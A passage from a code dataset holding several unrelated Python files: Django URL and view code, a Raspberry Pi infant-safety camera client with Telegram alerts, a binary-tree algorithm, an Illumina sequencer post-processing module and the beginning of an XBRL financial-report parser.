r\"^study/(?P\\d+)/protocol/create/$\",\n views.MetaProtocolCreate.as_view(),\n name=\"protocol_create\",\n ),\n url(r\"^protocol/(?P\\d+)/$\", views.MetaProtocolDetail.as_view(), name=\"protocol_detail\",),\n url(\n r\"^protocol/(?P\\d+)/update/$\",\n views.MetaProtocolUpdate.as_view(),\n name=\"protocol_update\",\n ),\n url(\n r\"^protocol/(?P\\d+)/delete/$\",\n views.MetaProtocolDelete.as_view(),\n name=\"protocol_delete\",\n ),\n # result views\n url(r\"^assessment/(?P\\d+)/results/$\", views.MetaResultList.as_view(), name=\"result_list\",),\n url(\n r\"^protocol/(?P\\d+)/result/create/$\",\n views.MetaResultCreate.as_view(),\n name=\"result_create\",\n ),\n url(\n r\"^protocol/(?P\\d+)/result/copy-as-new-selector/$\",\n views.MetaResultCopyAsNew.as_view(),\n name=\"result_copy_selector\",\n ),\n url(r\"^result/(?P\\d+)/$\", views.MetaResultDetail.as_view(), name=\"result_detail\"),\n url(r\"^result/(?P\\d+)/update/$\", views.MetaResultUpdate.as_view(), name=\"result_update\",),\n url(r\"^result/(?P\\d+)/delete/$\", views.MetaResultDelete.as_view(), name=\"result_delete\",),\n]\n","sub_path":"hawc/apps/epimeta/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"562433786","text":"# USAGE\n#python3 smartmobile_first_client.py --prototxt MobileNetSSD_deploy.prototxt --model MobileNetSSD_deploy.caffemodel\n\n\n# import the necessary packages\nfrom imutils.video import VideoStream\nfrom imutils.video import FPS\nfrom gpiozero import Buzzer\nfrom time import sleep\nimport socket\nimport numpy as np\nimport argparse\nimport imutils\nimport cv2\nimport serial\nimport datetime\nimport os\nimport telepot\n\nimport RPi.GPIO as GPIO\n\nport = 8888\nclient_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nclient_socket.connect((\"SERVER ADDRESS\", port))\nclient_socket.send(\"first\".encode())\n#텔레그램 봇 토큰과 봇 생성\nmy_token = 'INSERT TELEGRAM BOT TOKEN'\nbot = telepot.Bot(my_token)\n\ntelegram_id = 'INSERT TELEGRAM ID'\nos.system(\"sudo rfcomm bind rfcomm0 BLUETOOTH ADDRESS\")\n#경고 메세지\nmsg_face = '뒤집힘 경고'\nmsg_object = '관심영역 경고'\n\n#GPIO input/output 설정\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(17, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n\n#부저 생성\nbuzzer = Buzzer(3)\n\n#현재 시간을 초로 계산하여 반환\ndef total():\n now = datetime.datetime.now()\n nowTuple = now.timetuple()\n total_sec = nowTuple.tm_sec +(nowTuple.tm_min*60) + (nowTuple.tm_hour*3600) + (nowTuple.tm_mday * 3600 * 24) + (nowTuple.tm_mon * 3600 * 24 * nowTuple.tm_mday) + (nowTuple.tm_year * 3600 * 24 * 365.25)\n\n return int(total_sec)\n\n\n# construct the argument parse and parse the arguments\n#ap = argparse.ArgumentParser()\n#ap.add_argument(\"-p\", \"--prototxt\", required=True,\n#\thelp=\"path to Caffe 'deploy' prototxt file\")\n#ap.add_argument(\"-m\", \"--model\", required=True,\n#\thelp=\"path to Caffe pre-trained model\")\n#ap.add_argument(\"-c\", \"--confidence\", type=float, default=0.2,\n#\thelp=\"minimum probability to filter weak detections\")\n#ap.add_argument(\"-u\", \"--movidius\", type=bool, default=0,\n#\thelp=\"boolean indicating if the Movidius should be used\")\n#args = vars(ap.parse_args())\n\n\n\n# initialize the list of class labels MobileNet SSD was trained to\n# detect, then generate a set of bounding box colors for each class\n\nIGNORE = set([\"background\", \"aeroplane\", \"bicycle\", \"bird\", \"boat\",\n \"bottle\", \"bus\", \"car\", \"cat\", \"chair\", \"cow\", \"diningtable\",\n \"dog\", \"horse\", \"motorbike\", \"pottedplant\", \"sheep\",\n \"sofa\", \"train\", \"tvmonitor\"])\n\n\nCLASSES = [\"background\", \"aeroplane\", \"bicycle\", \"bird\", \"boat\",\n\t\"bottle\", \"bus\", \"car\", \"cat\", \"chair\", \"cow\", \"diningtable\",\n\t\"dog\", \"horse\", \"motorbike\", \"person\", \"pottedplant\", \"sheep\",\n\t\"sofa\", \"train\", \"tvmonitor\"]\n##------edited COLORS = np.random.uniform(0, 255, size=(len(CLASSES), 3))\n\n\n\n# load our serialized model from disk\nprint(\"[INFO] loading model...\")\n#people_net = cv2.dnn.readNetFromCaffe(args[\"prototxt\"], args[\"model\"])\npeople_net = cv2.dnn.readNetFromCaffe(\"/home/pi/infant_accident_prevention_system_development/MobileNetSSD_deploy.prototxt\",\"/home/pi/infant_accident_prevention_system_development/MobileNetSSD_deploy.caffemodel\")\nface_net = cv2.dnn.readNetFromCaffe(\"/home/pi/infant_accident_prevention_system_development/deploy.prototxt.txt\",\"/home/pi/infant_accident_prevention_system_development/res10_300x300_ssd_iter_140000.caffemodel\")\n\nfps = FPS().start()\n#vs = VideoStream(src=0).start()\n#USE WebCam\n\nframe = 0\n\n# specify the target device as the Myriad processor on the NCS\npeople_net.setPreferableTarget(cv2.dnn.DNN_TARGET_MYRIAD)\nface_net.setPreferableTarget(cv2.dnn.DNN_TARGET_MYRIAD)\n# initialize the video stream, allow the cammera sensor to warmup,\n# and initialize the FPS counter\n\n#----------------------------------------------------------------------------------------\n#print(\"[INFO] starting video stream...\")\n\n\n#vs = VideoStream(usePiCamera=True).start()\nvs = cv2.VideoCapture(2, cv2.CAP_V4L)\n\n#time.sleep(2.0)\n#fps = FPS().start()\n\n\ndef total():\n now = datetime.datetime.now()\n nowTuple = now.timetuple()\n total_sec = nowTuple.tm_sec +(nowTuple.tm_min*60) + (nowTuple.tm_hour*3600) + (nowTuple.tm_mday * 3600 * 24) + (nowTuple.tm_mon * 3600 * 24 * nowTuple.tm_mday) + (nowTuple.tm_year * 3600 * 24 * 365.25)\n\n return int(total_sec)\n\ndef imgprocessing_people():\n # loop over the frames from the video stream\n global frame\n global people_net\n global fps\n global vs\n global CLASSES\n global count\n global buzzer\n\n global serial\n\n global msg_face\n global msg_object\n global bot\n global telegram_id\n global client_socket\n\n ROI_EVENT_FLAG = False\n ROI_EVENT_START_TIME = 0\n ROI_EVENT_START_TIME_FLAG = False\n\n\n FACE_EVENT_FLAG = False\n FACE_EVENT_START_TIME = 0\n FACE_EVENT_START_TIME_FLAG = False\n\n # loop over the frames from the video stream\n bluetoothSerial = serial.Serial(\"/dev/rfcomm0\", baudrate=9600)\n\n# face_num = 0\n while True:\n if GPIO.input(17) == 0:\n print(\"reset!\")\n ROI_EVENT_FLAG = False\n ROI_EVENT_START_TIME_FLAG = False\n FACE_EVENT_START_TIME_FLAG = False\n buzzer.off()\n\n\t# grab the frame from the threaded video stream and resize it\n\t# to have a maximum width of 400 pixels\n ret, frame = vs.read()\n\n #frame = imutils.resize(frame, width=800)\n\t# grab the frame dimensions and convert it to a blob\n (h, w) = frame.shape[:2]\n#-----------------------------------------------------------------------------\n people_blob = cv2.dnn.blobFromImage(frame, 0.007843, (300, 300), 127.5)\n face_blob = cv2.dnn.blobFromImage(cv2.resize(frame, (300, 300)), 1.0,(300, 300), (104.0, 177.0, 123.0))\n # pass the blob through the network and obtain the detections and\n\t# predictions\n people_net.setInput(people_blob)\n people_detections = people_net.forward()\n\n face_net.setInput(face_blob)\n face_detections = face_net.forward()\n\n line_left_topx = 100\n line_left_topy = 50\n line_right_botx = 500\n line_right_boty = 550\n weight = 10\n cv2.rectangle(frame, (line_left_topx, line_left_topy), (line_right_botx, line_right_boty),(255,255,255), 2)\n ROI_EVENT_FLAG = True\n\t# loop over the detections\n for i in np.arange(0, people_detections.shape[2]):\n people_confidence = people_detections[0, 0, i, 2]\n #print(people_idx)\n #print(CLASSES[people_idx])\n people_idx = int(people_detections[0, 0, i, 1])\n if CLASSES[people_idx] in IGNORE:\n continue\n\n if people_confidence > 0.2:\n #people_idx = int(people_detections[0, 0, i, 1])\n #print(people_idx)\n #print(CLASSES[people_idx])\n #if CLASSES[people_idx] in IGNORE:\n # continue\n\n people_box = people_detections[0, 0, i, 3:7] * np.array([w, h, w, h])\n (people_startX, people_startY, people_endX, people_endY) = people_box.astype(\"int\")\n\n #영역 이탈 감지\n if people_startX < line_left_topx+weight or people_endX > line_right_botx-weight or people_startY < line_left_topy+weight or people_endY > line_right_boty-weight:\n print('ROI WARNING')\n ROI_EVENT_FLAG = True\n\n else :\n\n print('ROI_safety')\n ROI_EVENT_FLAG = False\n\n\n cv2.rectangle(frame, (people_startX, people_startY), (people_endX, people_endY),(255,0,0), 2)\n\n\n if ROI_EVENT_FLAG: #영역 이탈한 경우\n\n if not ROI_EVENT_START_TIME_FLAG: #영역 이탈 첫 발생\n ROI_EVENT_START_TIME = total()\n ROI_EVENT_START_TIME_FLAG = True\n\n else : #이미 영역 이탈 발생\n diff_sec = total() - ROI_EVENT_START_TIME\n print(\"ROI event warning \"+str(diff_sec))\n\n if diff_sec % 2 == 0 : #관심영역 경고 텔레그램 알림\n bot.sendMessage(chat_id = telegram_id, text = msg_object)\n\n if diff_sec >= 5: #관심영역 경고가 5초이상 지속되��을 시 시간에따라 진동 혹은 부저 알림\n #ROI_now = datetime.datetime.now()\n #ROI_event_time = ROI_now.replace(hour=10, minute=59, second=0,microsecond=0)\n #if ROI_now > ROI_event_time: #기준점과 시간 비교\n # buzzer.off()\n # bluetoothSerial.write(str(\"w\").encode('utf-8'))\n #else:\n # buzzer.on()\n bluetoothSerial.write(str(\"w\").encode('utf-8'))\n\n else : #영역 이탈 정상 경우\n ROI_EVENT_START_TIME_FLAG = False\n\n\n\n face_num = 0\n\n #for i in range(0, face_detections.shape[2]):\n for i in np.arange(0, face_detections.shape[2]):\n face_confidence = face_detections[0, 0, i, 2]\n if face_confidence < 0.25:\n continue\n else:\n face_num += 1\n face_box = face_detections[0, 0, i, 3:7] * np.array([w,h,w,h])\n (face_startX, face_startY, face_endX, face_endY) = face_box.astype(\"int\")\n #face_text = \"{:.2f}%\".format(face_confidence * 100)\n #face_y = face_startY - 10 if face_startY - 10 > 10 else face_startY + 10\n cv2.rectangle(frame, (face_startX, face_startY), (face_endX, face_endY),(0, 0, 255), 2)\n #cv2.putText(frame, face_text, (face_startX, face_y),cv2.FONT_HERSHEY_SIMPLEX, 0.45,(0,0,255),2)\n print(face_num)\n if face_num == 0:\n if not FACE_EVENT_START_TIME_FLAG:\n FACE_EVENT_START_TIME = total()\n FACE_EVENT_START_TIME_FLAG = True\n else :\n diff_sec = total() - FACE_EVENT_START_TIME\n print(\"FACE event warning \"+str(diff_sec))\n if diff_sec % 2 == 0:\n bot.sendMessage(chat_id = telegram_id, text = msg_face)\n if diff_sec >= 5:\n #FACE_now = datetime.datetime.now()\n #FACE_event_time = FACE_now.replace(hour=10, minute=59, second=0,microsecond=0)\n #if FACE_now > FACE_event_time:\n # buzzer.off()\n # bluetoothSerial.write(str(\"w\").encode('utf-8'))\n #else:\n # buzzer.on()\n buzzer.on()\n else:\n FACE_EVENT_START_TIME_FLAG = False\n if not ROI_EVENT_FLAG:\n buzzer.off()\n\n\n #cv2.putText(frame, label, (startX, y),\n #cv2.FONT_HERSHEY_SIMPLEX, 0.5, COLORS[idx], 2)\n client_socket.send(\"send\".encode())\n # show the output frame\n cv2.imshow(\"frame\", frame)\n key = cv2.waitKey(1) & 0xFF\n\n\t# if the `q` key was pressed, break from the loop\n if key == ord(\"q\"):\n break\n\n\t# update the FPS counter\n fps.update()\n\n# stop the timer and display FPS information\n fps.stop()\n print(\"[INFO] elasped time: {:.2f}\".format(fps.elapsed()))\n print(\"[INFO] approx. FPS: {:.2f}\".format(fps.fps()))\n\n# do a bit of cleanup\n cv2.destroyAllWindows()\n vs.stop()\n buzzer.off()\n\n os.system('kill -9 '+str(os.getpid()))\n\nif __name__ == '__main__':\n imgprocessing_people()\n","sub_path":"FIRST_MOBILE/smartmobile_first_client.py","file_name":"smartmobile_first_client.py","file_ext":"py","file_size_in_byte":11280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"162743346","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n\nclass Solution(object):\n def distanceK(self, root, target, K):\n \"\"\"\n :type root: TreeNode\n :type target: TreeNode\n :type K: int\n :rtype: List[int]\n \"\"\"\n res = []\n\n def find_nodes_and_add(node, cur_depth, target_depth):\n if not node:\n return\n if cur_depth == target_depth:\n res.append(node.val)\n return\n find_nodes_and_add(node.left, cur_depth + 1, target_depth)\n find_nodes_and_add(node.right, cur_depth + 1, target_depth)\n\n def dfs(node, cur_depth):\n if not node:\n return False, -1\n if node.val == target.val:\n find_nodes_and_add(node, 0, K)\n return True, 0\n l_has_target, l_target_dis = dfs(node.left, cur_depth + 1)\n r_has_target, r_target_dis = dfs(node.right, cur_depth + 1)\n # print node.val, l_has_target, l_target_dis, r_has_target, r_target_dis\n if not l_has_target and not r_has_target:\n return False, -1\n target_dis = l_target_dis + 1 if l_has_target else r_target_dis + 1\n find_back_dis = K - target_dis\n if find_back_dis < 0:\n return False, -1\n if find_back_dis == 0:\n res.append(node.val)\n return False, -1\n find_back_node = node.left if r_has_target else node.right\n find_nodes_and_add(find_back_node, 0, find_back_dis - 1)\n return True, target_dis\n\n dfs(root, 0)\n\n return res\n","sub_path":"tree/863_all_nodes_distance_k_in_binary_tree.py","file_name":"863_all_nodes_distance_k_in_binary_tree.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"406757151","text":"from django.shortcuts import render, HttpResponse, get_object_or_404, redirect, HttpResponseRedirect\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Message, Phone, Company, PhoneRequest\nfrom django.utils import timezone\nimport redis\nimport json\n\n\ndef startpage(request):\n\treturn render(request, 'smscab/index.html')\n\n@login_required\ndef companyregistration(request):\n\tif request.method == 'POST':\n\t\tnewcompany = Company()\n\t\tnewcompany.owner = request.user\n\t\tnewcompany.companyName = request.POST['companyname']\n\t\tnewcompany.save()\n\t\treturn HttpResponseRedirect('/replyroom')\n\telse:\n\t\treturn render(request, 'smscab/company_registration.html')\n\n@login_required\ndef replyroom(request):\n\ttry:\n\t\tcompany = Company.objects.get(owner=request.user)\n\texcept Company.DoesNotExist:\n\t\treturn redirect('company_registration')\n\tcompany = get_object_or_404(Company, owner=request.user)\n\tphones = Phone.objects.filter(company=company)\n\tif not phones:\n\t\tphones = Phone.objects.filter(phoneNumber='79066677358')\n\treturn render(request, 'smscab/cabinet.html', {'phones': phones})\n\n@login_required\ndef messages_lookup(request, pk):\n\tcompany = get_object_or_404(Company, owner=request.user)\n\tphones = Phone.objects.filter(company=company)\n\tif not phones:\n\t\tphone = get_object_or_404(Phone, phoneNumber='79066677358')\n\t\tphones = [phone]\n\telse:\n\t\tphone = get_object_or_404(Phone, pk=pk)\n\tcurphone = phone.phoneNumber\n\tmessages = Message.objects.filter(companyNumber=phone)\n\targs = {\n\t\t'messages': messages,\n\t\t'phones': phones,\n\t\t'phonePK': pk,\n\t\t'curphone': curphone\n\t}\n\treturn render(request, 'smscab/messages_lookup.html', args)\n\n@login_required\ndef settings(request):\n\tif request.method == 'POST':\n\t\tpass\n\telse:\n\t\tcompany = get_object_or_404(Company, owner=request.user)\n\t\tphones = Phone.objects.filter(company=company)\n\t\tphoneRequests = PhoneRequest.objects.filter(company=company)\n\t\targs = {\n\t\t\t\t'phones': phones,\n\t\t\t\t'company': company,\n\t\t\t\t'phoneRequests': phoneRequests\n\t\t\t}\n\t\treturn render(request, 'smscab/settings.html', args)\n\n@login_required\ndef updatephoneinfo(request):\n\tif request.method == 'POST':\n\t\tpk = request.POST['pk']\n\t\tphone = get_object_or_404(Phone, pk=pk)\n\t\tspotname = request.POST['spotname']\n\t\tspotaddress = request.POST['spotaddress']\n\t\tphone.spotName = spotname\n\t\tphone.spotAddress = spotaddress\n\t\tphone.save()\n\treturn HttpResponse('info received')\n\n@login_required\ndef requestnewphone(request):\n\tif request.method == 'POST':\n\t\tspotname = request.POST['spotname']\n\t\tspotaddress = request.POST['spotaddress']\n\t\tphoneRequest = PhoneRequest()\n\t\tphoneRequest.spotName = spotname\n\t\tphoneRequest.spotAddress = spotaddress\n\t\tphoneRequest.company = get_object_or_404(Company, owner=request.user)\n\t\tphoneRequest.requestStatus = 'Заявка принята. Менеджер с Вами свяжется в ближайшее время.'\n\t\tphoneRequest.save()\n\t\treturn HttpResponseRedirect('/settings/')\n\telse:\n\t\treturn HttpResponse('Please use POST')\n\n@login_required\ndef companyupdate(request):\n\tif request.method == 'POST':\n\t\tcompany = get_object_or_404(Company, owner=request.user)\n\t\tcompanyName = request.POST['companyname']\n\t\tcompanyAddress = request.POST['contactaddress']\n\t\tcompanyContactName = request.POST['companycontactname']\n\t\tcompanyContactPhone = request.POST['companycontactphone']\n\t\tcompany.companyName = companyName\n\t\tcompany.companyAddress = companyAddress\n\t\tcompany.companyContactName = companyContactName\n\t\tcompany.companyContactPhone = companyContactPhone\n\t\tcompany.save()\n\t\treturn HttpResponseRedirect('/settings/')\n\t\n\n\ndef sitelogin(request):\n\tusername = request.POST['username']\n\tpassword = request.POST['password']\n\tuser = authenticate(username=username, password=password)\n\tif user is not None:\n\t\tif user.is_active:\n\t\t\tlogin(request, user)\n\t\t\treturn redirect('replyroom')\n\t\telse:\n\t\t\treturn HttpResponse('error')\n\telse:\n\t\treturn HttpResponse('error')\n\ndef receivesms(request):\n\tif request.method == 'GET':\n\t\tsms = request.GET.get('m','')\n\t\tclientPhoneNumber = request.GET.get('p','')\n\t\tcompanyPhoneNumber = request.GET.get('c','')\n\t\tcompanyNumber = get_object_or_404(Phone, phoneNumber=companyPhoneNumber)\n\t\tif not Message.objects.filter(clientNumber=clientPhoneNumber, companyNumber=companyNumber):\n\t\t\tMessage.objects.create(\n\t\t\t\tclientNumber=clientPhoneNumber,\n\t\t\t\tcompanyNumber=get_object_or_404(Phone, phoneNumber=companyPhoneNumber),\n\t\t\t\tmessage=sms,\n\t\t\t\tanswers=[])\n\t\telse:\n\t\t\tmessage = get_object_or_404(Message, clientNumber=clientPhoneNumber)\n\t\t\tmessage.message+=sms\n\t\t\tmessage.save()\n\t\tredis_client = redis.Redis()\n\t\tredis_client.publish('broadcast_channel', json.dumps({\"text\": sms}))\n\t\tif sms == '':\n\t\t\treturn HttpResponse('message can not be empty')\n\t\telse:\n\t\t\treturn HttpResponse('message received')\n\telse:\n\t\tHttpResponseRedirect('please use get')\n\ndef replysms(request, pk):\n\tif request.method == 'POST':\n\t\tmessage = get_object_or_404(Message, pk=pk)\n\t\tanswer = request.POST['answer']\n\t\tmessage.answers.append(answer)\n\t\tmessage.save()\n\n\treturn HttpResponseRedirect('/replyroom/')\n\n\n\n\n\n\n","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"463636583","text":"\"\"\"Support integration with Illumina sequencer machines.\n\"\"\"\nimport glob\nimport os\nimport operator\nfrom xml.etree.ElementTree import ElementTree\n\nimport yaml\nimport logbook\n\nfrom bcbio.log import setup_local_logging, logger\nfrom bcbio.illumina import demultiplex, samplesheet\nfrom bcbio.galaxy import nglims\n\n# ## bcbio-nextgen integration\n\ndef check_and_postprocess(args):\n \"\"\"Check for newly dumped sequencer output, post-processing and transferring.\n \"\"\"\n with open(args.process_config) as in_handle:\n config = yaml.safe_load(in_handle)\n setup_local_logging()\n for dname in _find_unprocessed(config):\n runinfo = nglims.get_runinfo(config[\"galaxy_url\"], config[\"galaxy_apikey\"], dname)\n lane_details = nglims.flatten_lane_detail(runinfo)\n fcid_ss = samplesheet.from_flowcell(dname, lane_details)\n fastq_dir = demultiplex.run_bcl2fastq(dname, fcid_ss, config)\n #_update_reported(config[\"msg_db\"], dname)\n\ndef add_subparser(subparsers):\n \"\"\"Add command line arguments for post-processing sequencer results.\n \"\"\"\n parser = subparsers.add_parser(\"sequencer\", help=\"Post process results from a sequencer.\")\n parser.add_argument(\"process_config\", help=\"YAML file specifying sequencer details for post-processing.\")\n return parser\n\n# ## Dump directory processing\n\ndef _find_unprocessed(config):\n \"\"\"Find any finished directories that have not been processed.\n \"\"\"\n reported = _read_reported(config[\"msg_db\"])\n for dname in _get_directories(config):\n if os.path.isdir(dname) and dname not in reported:\n if _is_finished_dumping(dname):\n yield dname\n\ndef _get_directories(config):\n for directory in config[\"dump_directories\"]:\n for dname in sorted(glob.glob(os.path.join(directory, \"*[Aa]*[Xx][Xx]\"))):\n if os.path.isdir(dname):\n yield dname\n\ndef _is_finished_dumping(directory):\n \"\"\"Determine if the sequencing directory has all files.\n\n The final checkpoint file will differ depending if we are a\n single or paired end run.\n \"\"\"\n #if _is_finished_dumping_checkpoint(directory):\n # return True\n # Check final output files; handles both HiSeq and GAII\n run_info = os.path.join(directory, \"RunInfo.xml\")\n hi_seq_checkpoint = \"Basecalling_Netcopy_complete_Read%s.txt\" % \\\n _expected_reads(run_info)\n to_check = [\"Basecalling_Netcopy_complete_SINGLEREAD.txt\",\n \"Basecalling_Netcopy_complete_READ2.txt\",\n hi_seq_checkpoint]\n return reduce(operator.or_,\n [os.path.exists(os.path.join(directory, f)) for f in to_check])\n\ndef _is_finished_dumping_checkpoint(directory):\n \"\"\"Recent versions of RTA (1.10 or better), write the complete file.\n\n This is the most straightforward source but as of 1.10 still does not\n work correctly as the file will be created at the end of Read 1 even\n if there are multiple reads.\n \"\"\"\n check_file = os.path.join(directory, \"Basecalling_Netcopy_complete.txt\")\n check_v1, check_v2 = (1, 10)\n if os.path.exists(check_file):\n with open(check_file) as in_handle:\n line = in_handle.readline().strip()\n if line:\n version = line.split()[-1]\n v1, v2 = [float(v) for v in version.split(\".\")[:2]]\n if ((v1 > check_v1) or (v1 == check_v1 and v2 >= check_v2)):\n return True\n\ndef _expected_reads(run_info_file):\n \"\"\"Parse the number of expected reads from the RunInfo.xml file.\n \"\"\"\n reads = []\n if os.path.exists(run_info_file):\n tree = ElementTree()\n tree.parse(run_info_file)\n read_elem = tree.find(\"Run/Reads\")\n reads = read_elem.findall(\"Read\")\n return len(reads)\n\n# ## Flat file of processed directories\n\ndef _read_reported(msg_db):\n \"\"\"Retrieve a list of directories previous reported.\n \"\"\"\n reported = []\n if os.path.exists(msg_db):\n with open(msg_db) as in_handle:\n for line in in_handle:\n reported.append(line.strip())\n return reported\n\ndef _update_reported(msg_db, new_dname):\n \"\"\"Add a new directory to the database of reported messages.\n \"\"\"\n with open(msg_db, \"a\") as out_handle:\n out_handle.write(\"%s\\n\" % new_dname)\n","sub_path":"bcbio/illumina/machine.py","file_name":"machine.py","file_ext":"py","file_size_in_byte":4298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"406042666","text":"\"\"\"xbrl_jpfr\"\"\"\n\nfrom os.path import join as os_join\nfrom os.path import basename as os_basename\nfrom os.path import dirname as os_dirname\nfrom re import match as re_match\nfrom collections import OrderedDict\nfrom traceback import format_exc\nfrom dateutil.parser import parse as dateutil_parser_parse\nimport xbrl_namespace\nfrom xbrl_util import get_etree_obj_from_file\n\nclass Parser:\n \"\"\"xbrlファイル解析クラス\"\"\"\n def __init__(self, file, file_data, org_file_name):\n self.file = file\n\n # ファイル名解析\n self.info = self.parse_filename(os_basename(org_file_name))\n if self.info['報告書'] is None:\n # 再解析\n if 'E25850-' in org_file_name:\n self.info = self.parse_filename_e25850(os_basename(org_file_name))\n\n # XBRLファイル読み込み\n self.root = get_etree_obj_from_file(self.file, file_data)\n self.nsmap = self.root.nsmap\n self.ns_prefixes = {v: k for (k, v) in self.nsmap.items()}\n\n # 名前空間 文書情報タクソノミ\n self.ns_di = None\n\n # 名前空間 企業別タクソノミ\n self.ns_self = None\n\n # 名前空間 IFRS\n self.ns_ifrs = None\n\n # 名前空間 その他スキーマ\n self.ns_jpfr_oe = None\n\n # 名前空間 xbrldi\n self.ns_xbrldi = None\n\n # 勘定科目などを定義している名前空間を取得\n ns_list = []\n if self.info['会計基準'] == 'jpfr':\n # 名前空間(NameSpace)の定義を取得\n ns_def = xbrl_namespace.NS_INSTANCE_20130301\n\n for (ns_prefix, namespace) in self.nsmap.items():\n if ns_def['jpfr-di'](namespace):\n ns_list.append((0, namespace))\n self.ns_di = namespace\n elif re_match('^jpfr-t-[a-z]*$', ns_prefix):\n ns_list.append((1, namespace))\n elif ns_def['self'](ns_prefix):\n ns_list.append((2, namespace))\n self.ns_self = namespace\n elif ns_def['jpfr-oe'](namespace):\n self.ns_jpfr_oe = namespace\n\n ns_list.sort(key=lambda x: (x[0], x[1]), reverse=False)\n\n elif self.info['会計基準'] == 'ifrs':\n # 名前空間(NameSpace)の定義を取得\n ns_def = xbrl_namespace.NS_INSTANCE_IFRS_20130301\n\n for (ns_prefix, namespace) in self.nsmap.items():\n if ns_def['ifrs'](namespace):\n ns_list.append((0, namespace))\n self.ns_ifrs = namespace\n elif ns_def['self'](ns_prefix):\n ns_list.append((1, namespace))\n self.ns_self = namespace\n elif ns_def['xbrldi'] == namespace:\n self.ns_xbrldi = namespace\n\n ns_list.sort(key=lambda x: (x[0], x[1]), reverse=False)\n\n else:\n print('会計基準の判定失敗')\n raise\n\n # タグ名/属性名定義\n self.link_schema_ref = '{%s}schemaRef' % ns_def['link']\n self.xlink_href = '{%s}href' % ns_def['xlink']\n self.xbrli_context = '{%s}context' % ns_def['xbrli']\n self.xbrli_entity = '{%s}entity' % ns_def['xbrli']\n self.xbrli_identifier = '{%s}identifier' % ns_def['xbrli']\n self.xbrli_period = '{%s}period' % ns_def['xbrli']\n self.xbrli_start_date = '{%s}startDate' % ns_def['xbrli']\n self.xbrli_end_date = '{%s}endDate' % ns_def['xbrli']\n self.xbrli_instant = '{%s}instant' % ns_def['xbrli']\n self.xbrli_scenario = '{%s}scenario' % ns_def['xbrli']\n self.jpfr_oe_non_consolidated = '{%s}NonConsolidated' % self.ns_jpfr_oe if self.ns_jpfr_oe else None\n self.xbrldi_explicit_member = '{%s}explicitMember' % self.ns_xbrldi if self.ns_xbrldi else None\n self.xsi_nil = '{%s}nil' % ns_def['xsi']\n\n # xsdのファイルパスと名前空間を取得\n self.xsd = self.get_xsd_filepath(file_data)\n\n # コンテキストタグ(日付情報)取得\n self.context_tags = self.get_context_tags()\n\n # 管理情報・財務諸表データ取得\n self.xbrl_datas = []\n for (number, ns) in ns_list:\n self.xbrl_datas.append((ns, self.get_xbrl_datas(ns)))\n\n # 変数削除\n del self.root\n return\n\n @staticmethod\n def parse_filename(s):\n \"\"\"ファイル名解析\"\"\"\n # 0 1 2 3 4\n # 01234567890123456789012345678901234567890123456789\n # jpfr-asr-E00000-000-2012-03-31-01-2012-06-22.xbrl\n od = OrderedDict()\n od.update({'会計基準': s[0:4]})\n\n try:\n # 第N期の数字を判定\n t = s[5:8]\n od.update({'報告書': t})\n\n if t == 'asr':\n # 有価証券報告書\n od.update({'第N期': 0})\n elif re_match('^q[1-5]r$', t):\n # 四半期報告書\n od.update({'第N期': int(t[1])})\n elif t == 'ssr':\n # 半期報告書\n od.update({'第N期': 2})\n else:\n # 有価証券届出書\n # みなし有価証券届出書\n od.update({'第N期': None})\n\n od.update({'EDINETコード_ファンドコード': s[9:15]})\n od.update({'追番': int(s[16:19])})\n od.update({'報告対象期間期末日': dateutil_parser_parse(s[20:30])})\n od.update({'提出回数': int(s[31:33])})\n od.update({'提出日': dateutil_parser_parse(s[34:44])})\n except ValueError:\n print('不正なファイル名\\n%s' % format_exc())\n od.update({\n '報告書': None, '第N期': None, 'EDINETコード_ファンドコード': None,\n '追番': None, '報告対象期間期末日': None, '提出回数': None, '提出日': None,\n })\n return od\n\n @staticmethod\n def parse_filename_e25850(s):\n \"\"\"ファイル名解析(E25850)\"\"\"\n # 0 1 2 3 4\n # 01234567890123456789012345678901234567890123456789\n # 通常 ifrs-asr-E00000-000-2012-03-31-01-2012-06-22.xbrl\n # 0 1 2 3 4 5\n # 012345678901234567890123456789012345678901234567890123\n # E25850 ifrs-asr-001_E00000-000_2014-12-31_01_2015-03-30.xbrl\n\n od = OrderedDict()\n od.update({'会計基準': s[0:4]})\n\n try:\n # 第N期の数字を判定\n t = s[5:8]\n od.update({'報告書': t})\n\n if t == 'asr':\n # 有価証券報告書\n od.update({'第N期': 0})\n elif re_match('^q[1-5]r$', t):\n # 四半期報告書\n od.update({'第N期': int(t[1])})\n elif t == 'ssr':\n # 半期報告書\n od.update({'第N期': 2})\n else:\n od.update({'第N期': t})\n\n # s[9:12] <- 無視 (不正な文字列)\n\n od.update({'EDINETコード_ファンドコード': s[13:19]})\n od.update({'追番': s[20:23]})\n od.update({'報告対象期間期末日': dateutil_parser_parse(s[24:34])})\n od.update({'提出回数': s[35:37]})\n od.update({'提出日': dateutil_parser_parse(s[38:48])})\n except ValueError:\n print('不正なファイル名\\n%s' % format_exc())\n od.update({\n '報告書': None, '第N期': None, 'EDINETコード_ファンドコード': None,\n '追番': None, '報告対象期間期末日': None, '提出回数': None, '提出日': None,\n })\n else:\n print('ファイル名 再解析 OK')\n return od\n\n def get_xsd_filepath(self, file_data):\n \"\"\"提出者別タクソノミのxsdファイルパス取得\"\"\"\n # xsdファイル名取得\n element = self.root.find('.//%s' % self.link_schema_ref)\n\n if file_data is None:\n # 絶対パス生成\n return os_join(os_dirname(self.file), element.get(self.xlink_href))\n else:\n return os_basename(element.get(self.xlink_href))\n\n def 